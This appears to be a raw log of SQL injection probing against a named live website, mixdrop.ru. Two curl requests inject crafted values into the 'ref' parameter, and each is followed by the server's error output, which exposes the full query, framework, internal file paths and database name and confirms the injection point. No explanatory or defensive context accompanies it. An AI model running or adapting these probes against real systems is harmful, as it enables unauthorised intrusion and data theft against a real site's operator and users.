curl 'https://mixdrop.ru/?ref=100/*fff*/'
Syntax error, unexpected token *, near to 'fff*/ AND ip = '*.*.*.*' LIMIT :APL0:', when parsing: SELECT [Ref].* FROM [Ref] WHERE user_id = 100/*fff*/ AND ip = '*.*.*.*' LIMIT :APL0: (90)
#0 [internal function]: Phalcon\Mvc\Model\Query->parse()
#1 [internal function]: Phalcon\Mvc\Model\Query->execute()
#2 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 100/*...')
#3 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 100/*...')
#4 [internal function]: GamesController->indexAction()
#5 [internal function]: Phalcon\Dispatcher->dispatch()
#6 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
#7 {main}

curl 'https://mixdrop.ru/?ref=90+or+user_id=a()'
SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION mixdrop.ru.a does not exist
#0 [internal function]: PDOStatement->execute()
#1 [internal function]: Phalcon\Db\Adapter\Pdo->executePrepared(Object(PDOStatement), Array, Array)
#2 [internal function]: Phalcon\Db\Adapter\Pdo->query('SELECT `ref`.`i...', Array, Array)
#3 [internal function]: Phalcon\Mvc\Model\Query->_executeSelect(Array, Array, Array)
#4 [internal function]: Phalcon\Mvc\Model\Query->execute()
#5 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 90 o...')
#6 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 90 o...')
#7 [internal function]: GamesController->indexAction()
#8 [internal function]: Phalcon\Dispatcher->dispatch()
#9 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
#10 {main}